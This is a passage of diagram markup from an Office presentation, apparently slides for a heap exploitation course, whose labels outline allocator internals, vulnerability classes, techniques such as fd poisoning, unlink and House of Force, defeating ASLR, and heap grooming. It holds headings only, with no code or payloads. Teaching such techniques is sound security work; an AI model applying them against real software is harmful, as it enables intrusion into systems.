    <dgm:cxn modelId="{854268C9-5184-FD41-A669-1256AC0FB109}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{C8469139-03BB-CA44-8777-2B0B568DE71E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{4B557666-179B-AB47-B4BE-C459FF62036F}" type="presParOf" srcId="{C8469139-03BB-CA44-8777-2B0B568DE71E}" destId="{973CB7B2-16D8-7F49-9FB8-AE2A52737AB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{F6B9D0C6-D51B-4044-A53D-04F5C7975C2F}" type="presParOf" srcId="{C8469139-03BB-CA44-8777-2B0B568DE71E}" destId="{EF893BCE-F4CC-ED49-95DC-A64A744D0E7E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{BEEC9836-83F2-AC42-88B1-16BDFE37C2A4}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{0A240A55-8989-C64D-A7B3-8871B2A2D612}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{0F690832-91D1-264C-8686-B34EE781A7EC}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{3F48FB5C-7DE3-D749-A570-B2EEF37E51C8}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E980A27E-0F4E-8347-A809-386BD41F13F2}" type="presParOf" srcId="{3F48FB5C-7DE3-D749-A570-B2EEF37E51C8}" destId="{646F0876-EBC3-034F-A124-99E877C84DA0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B903454C-E648-5444-9829-538748CB2B30}" type="presParOf" srcId="{3F48FB5C-7DE3-D749-A570-B2EEF37E51C8}" destId="{03F097F3-E8F4-3345-B7D6-924AAC59545B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{0608C291-3FE4-C14F-A9A6-7E5CAE03C073}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{0845AE79-0C4F-EC4C-98A8-7C4C74C03E65}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3275CC46-E2DA-9E4C-84D6-9EE0AA9C76E1}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{723DD4A4-8B91-1240-B797-DC40AC969E18}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B503C812-D8B0-924C-89BB-4C7F47842209}" type="presParOf" srcId="{723DD4A4-8B91-1240-B797-DC40AC969E18}" destId="{DCF075F6-CF4D-B84F-995C-FC8443EB7A11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{21BB043F-1AAC-D14E-8101-6177AFBF9721}" type="presParOf" srcId="{723DD4A4-8B91-1240-B797-DC40AC969E18}" destId="{ADE0577C-D23F-CA4E-AAD9-0E21B4303C8B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{02574AB7-E5DB-174E-A960-921BD372DA52}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{DB3C8761-2F71-E84C-9775-EEDD68C4059E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{318FBCFB-1CBA-894D-BFA0-12DDFACEFC17}" type="presParOf" srcId="{74C0434C-FDC3-A74B-A93D-BA07DC3CDE2D}" destId="{ED36771E-34CD-404C-84E1-020F3F9FBABF}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{64EA5BA8-EE42-0249-A4DC-E9605ADFBD5F}" type="presParOf" srcId="{ED36771E-34CD-404C-84E1-020F3F9FBABF}" destId="{C9949052-758F-1A42-AC10-81AEC590F6AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{EB4A5531-4E11-AD46-ADFD-1EE818002CED}" type="presParOf" srcId="{ED36771E-34CD-404C-84E1-020F3F9FBABF}" destId="{42EB9C0B-EEBF-6746-9405-EB24F1D30D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83B67D-2FD8-4CEE-BC3F-589E8CE291AD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FF46CDB-6A8E-4717-B73E-33A9C85DED79}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Creativity </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF6D3627-A811-4170-8EC3-055D26B0B2E6}" type="parTrans" cxnId="{97E3DF0A-9FAA-4385-9DB6-EC128CEE4861}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D8E4C68-8EAD-4352-89A1-3E524EB238CE}" type="sibTrans" cxnId="{97E3DF0A-9FAA-4385-9DB6-EC128CEE4861}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Heap feng shui</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91D72928-4AF7-41E9-904B-A656E8E8144E}" type="parTrans" cxnId="{57378A1F-5CE2-41E4-A0C8-A9A0F1726D92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3DE0E8B1-2A55-464B-91B7-8EA525B58941}" type="sibTrans" cxnId="{57378A1F-5CE2-41E4-A0C8-A9A0F1726D92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Deep understanding of code</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{569C0025-2EE9-41FD-A2EC-EDC3D3C8A15E}" type="parTrans" cxnId="{D56A9EBC-9BF8-4604-8671-D81BF9B20538}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CEB11AD-F21A-465F-9B19-385F086E5812}" type="sibTrans" cxnId="{D56A9EBC-9BF8-4604-8671-D81BF9B20538}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" type="pres">
      <dgm:prSet presAssocID="{1B83B67D-2FD8-4CEE-BC3F-589E8CE291AD}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B30B67F3-E925-3444-B968-18BC84104B3D}" type="pres">
      <dgm:prSet presAssocID="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{39D2C92F-1F14-374C-8350-D3BD5FE1828D}" type="pres">
      <dgm:prSet presAssocID="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4A6E5C01-D6AC-1443-B4E1-9EE5FFCD4E97}" type="pres">
      <dgm:prSet presAssocID="{5FF46CDB-6A8E-4717-B73E-33A9C85DED7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ADD5E46-6C04-BA44-9CCC-F0998C09BA7A}" type="pres">
      <dgm:prSet presAssocID="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FBE1BEC3-D8ED-D446-B7AB-9443EC03CA99}" type="pres">
      <dgm:prSet presAssocID="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD0BFD7A-55E1-3D48-9E47-39A4B8A7E055}" type="pres">
      <dgm:prSet presAssocID="{7D8E4C68-8EAD-4352-89A1-3E524EB238CE}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{474A3DA5-D966-E945-B750-7FADDD18B5BC}" type="pres">
      <dgm:prSet presAssocID="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C49AEC99-7626-C646-8ED3-36425763C938}" type="pres">
      <dgm:prSet presAssocID="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5A89B1EA-4B27-8247-90E3-36DF8A085054}" type="pres">
      <dgm:prSet presAssocID="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA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E890018-1729-2442-9F66-F8449CCE2C51}" type="pres">
      <dgm:prSet presAssocID="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6EA79D6D-79EB-7E48-B5AA-BFAD847CC03B}" type="pres">
      <dgm:prSet presAssocID="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E5A4938-16A7-B34F-8C45-A122994C3A62}" type="pres">
      <dgm:prSet presAssocID="{3DE0E8B1-2A55-464B-91B7-8EA525B58941}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D88C812-B000-564E-8B46-6C88AC19ABD9}" type="pres">
      <dgm:prSet presAssocID="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7A280B71-36B8-BE4C-AFE4-F61ADC849FB0}" type="pres">
      <dgm:prSet presAssocID="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8308956-C922-814C-BE5C-D8A44A268CC1}" type="pres">
      <dgm:prSet presAssocID="{C1ECC007-B08D-4123-9F7C-7D303E25E5C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0D5CBA5-5223-184C-AE80-609E43F5F6D8}" type="pres">
      <dgm:prSet presAssocID="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FCB0B013-4EB6-B24C-B1DB-ADD795E467BC}" type="pres">
      <dgm:prSet presAssocID="{C1ECC007-B08D-4123-9F7C-7D303E25E5C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7E3DF0A-9FAA-4385-9DB6-EC128CEE4861}" srcId="{1B83B67D-2FD8-4CEE-BC3F-589E8CE291AD}" destId="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" srcOrd="0" destOrd="0" parTransId="{AF6D3627-A811-4170-8EC3-055D26B0B2E6}" sibTransId="{7D8E4C68-8EAD-4352-89A1-3E524EB238CE}"/>
    <dgm:cxn modelId="{FCB3E60F-2E64-504D-B896-A62E0DC7BEF7}" type="presOf" srcId="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" destId="{4A6E5C01-D6AC-1443-B4E1-9EE5FFCD4E97}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C4E9E913-CB50-3846-880E-E6FE5EE207AE}" type="presOf" srcId="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" destId="{7A280B71-36B8-BE4C-AFE4-F61ADC849FB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{57378A1F-5CE2-41E4-A0C8-A9A0F1726D92}" srcId="{1B83B67D-2FD8-4CEE-BC3F-589E8CE291AD}" destId="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" srcOrd="1" destOrd="0" parTransId="{91D72928-4AF7-41E9-904B-A656E8E8144E}" sibTransId="{3DE0E8B1-2A55-464B-91B7-8EA525B58941}"/>
    <dgm:cxn modelId="{9D246440-C315-B64E-BBBB-26F0C740CCDA}" type="presOf" srcId="{5FF46CDB-6A8E-4717-B73E-33A9C85DED79}" destId="{39D2C92F-1F14-374C-8350-D3BD5FE1828D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{30926B7C-9521-724A-AA56-C07D80918A53}" type="presOf" srcId="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" destId="{D8308956-C922-814C-BE5C-D8A44A268CC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{29BBC7B1-50AB-C74B-921B-95A6393514F6}" type="presOf" srcId="{1B83B67D-2FD8-4CEE-BC3F-589E8CE291AD}" destId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{D56A9EBC-9BF8-4604-8671-D81BF9B20538}" srcId="{1B83B67D-2FD8-4CEE-BC3F-589E8CE291AD}" destId="{C1ECC007-B08D-4123-9F7C-7D303E25E5CB}" srcOrd="2" destOrd="0" parTransId="{569C0025-2EE9-41FD-A2EC-EDC3D3C8A15E}" sibTransId="{7CEB11AD-F21A-465F-9B19-385F086E5812}"/>
    <dgm:cxn modelId="{3D472ED2-E7B4-FB4C-9AD6-8DDDCA29476B}" type="presOf" srcId="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" destId="{C49AEC99-7626-C646-8ED3-36425763C938}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{01A664F9-645B-2C4D-A9A6-183E64ECA0EA}" type="presOf" srcId="{1EC3C2CF-21CD-40AC-9569-EAC118E7AAA8}" destId="{5A89B1EA-4B27-8247-90E3-36DF8A085054}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{13D7625D-F751-8B49-90D0-5E9C7923A5A8}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{B30B67F3-E925-3444-B968-18BC84104B3D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C45498EF-7CC8-0844-AC92-D7C63B52C112}" type="presParOf" srcId="{B30B67F3-E925-3444-B968-18BC84104B3D}" destId="{39D2C92F-1F14-374C-8350-D3BD5FE1828D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A1010621-0D0B-404B-A5E6-D80FEB2FD636}" type="presParOf" srcId="{B30B67F3-E925-3444-B968-18BC84104B3D}" destId="{4A6E5C01-D6AC-1443-B4E1-9EE5FFCD4E97}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{99B86AFC-1F98-A745-80AF-03B5C8E00EF1}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{8ADD5E46-6C04-BA44-9CCC-F0998C09BA7A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{95A922B8-3410-CE43-810D-F76D38B8E0F9}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{FBE1BEC3-D8ED-D446-B7AB-9443EC03CA99}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{81350606-2BD2-E748-8B4A-6B74C60F2A1E}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{BD0BFD7A-55E1-3D48-9E47-39A4B8A7E055}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{C24357C3-B8CD-4D46-BD0E-62F24A660ABA}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{474A3DA5-D966-E945-B750-7FADDD18B5BC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{83F0FD68-1EC9-8945-8083-7CAF7274F560}" type="presParOf" srcId="{474A3DA5-D966-E945-B750-7FADDD18B5BC}" destId="{C49AEC99-7626-C646-8ED3-36425763C938}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{AC3C6366-8E85-6341-A70B-EB7ED29C2C4A}" type="presParOf" srcId="{474A3DA5-D966-E945-B750-7FADDD18B5BC}" destId="{5A89B1EA-4B27-8247-90E3-36DF8A085054}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BA6D33D1-8192-A745-BEF6-5A43A9B3D934}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{DE890018-1729-2442-9F66-F8449CCE2C51}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8818B8F4-84F7-2943-8CA3-F7E6345A0785}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{6EA79D6D-79EB-7E48-B5AA-BFAD847CC03B}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{04545E9B-EACC-5E48-83BC-48C4D2396187}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{1E5A4938-16A7-B34F-8C45-A122994C3A62}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BA2B2043-5723-E04E-AA85-66D8F8524C66}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{7D88C812-B000-564E-8B46-6C88AC19ABD9}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BF2B906A-1B7D-B14F-82FE-22D3DFAC99FA}" type="presParOf" srcId="{7D88C812-B000-564E-8B46-6C88AC19ABD9}" destId="{7A280B71-36B8-BE4C-AFE4-F61ADC849FB0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6496E82D-DEB4-A044-978B-F53891C8D3DD}" type="presParOf" srcId="{7D88C812-B000-564E-8B46-6C88AC19ABD9}" destId="{D8308956-C922-814C-BE5C-D8A44A268CC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0962282E-836F-EA4A-9E3A-FE476D9ECE72}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{B0D5CBA5-5223-184C-AE80-609E43F5F6D8}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{23965673-98D2-FE49-B2E6-C9587B5B1E5F}" type="presParOf" srcId="{B76DC98F-15E0-AC4C-BBEF-F7F5FCD4E4E7}" destId="{FCB0B013-4EB6-B24C-B1DB-ADD795E467B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F373A-0F92-48E9-8265-301DD8910506}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1354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B7FAE-D146-49B6-8CC5-08B3C1BA6EF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="207661" y="155813"/>
          <a:ext cx="377565" cy="377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9B8C9-0A2B-40A8-9331-BB40445DC1BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="792888" y="1354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Introduction to the Allocator (chunks, bins, etc.) </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="792888" y="1354"/>
        <a:ext cx="7093811" cy="686483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CC042912-3B7C-4F7B-99FA-F146F2A6F950}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="859458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4D5D5-A81A-4F61-9B06-F8B9DDFA427B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="207661" y="1013917"/>
          <a:ext cx="377565" cy="377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F8A12-8F7E-473D-A2E0-444A7AF4CFC6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="792888" y="859458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Vulnerability Classes (use after free, overflow, double free) </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="792888" y="859458"/>
        <a:ext cx="7093811" cy="686483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{04E8DDB2-D5FD-4759-8AF7-4622C55AF0D5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1717562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38D49-E286-4FA3-99E5-2F2340A10930}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="207661" y="1872021"/>
          <a:ext cx="377565" cy="377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FF0D1-4A23-418F-A282-3117EA1DC2F7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="792888" y="1717562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Techniques (Fd Poison, Unlink, House of Force…) </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="792888" y="1717562"/>
        <a:ext cx="7093811" cy="686483"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AC42A769-9035-43C8-86E3-07B01B6EBD8E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2575666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D55A12-10BB-4371-8F01-164DAD6D4F79}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="207661" y="2730125"/>
          <a:ext cx="377565" cy="377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8257E-F815-46A4-8A00-25C28B2F807B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="792888" y="2575666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Information leaks/defeating ASLR</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="792888" y="2575666"/>
        <a:ext cx="7093811" cy="686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A7FF0-9837-9C4D-A601-2AD36DC83AF9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9447" y="346268"/>
          <a:ext cx="2550671" cy="7652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560" tIns="201560" rIns="201560" bIns="20156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Discovery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9447" y="346268"/>
        <a:ext cx="2550671" cy="765201"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5B6C1A69-BF31-2F48-BD81-0ABBF351EB0B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9447" y="1111470"/>
          <a:ext cx="2550671" cy="180576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950" tIns="251950" rIns="251950" bIns="25195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Find real vulnerabilities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UAF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Uninitialized memory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Integers overflows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Etc. </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9447" y="1111470"/>
        <a:ext cx="2550671" cy="1805764"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EB327EF0-AC35-D544-9E8E-21DBBF6AC732}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2668014" y="346268"/>
          <a:ext cx="2550671" cy="7652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560" tIns="201560" rIns="201560" bIns="20156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Groom</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2668014" y="346268"/>
        <a:ext cx="2550671" cy="765201"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FFE7C057-3DD9-FD4E-BB5E-66BCDDBBE4CE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2668014" y="1111470"/>
          <a:ext cx="2550671" cy="180576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950" tIns="251950" rIns="251950" bIns="25195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Heap Feng Shui like a professional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Allocation/deallocation primitives</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2668014" y="1111470"/>
        <a:ext cx="2550671" cy="1805764"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3308D2C7-7031-E147-B08E-4A839BD7E511}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5326580" y="346268"/>
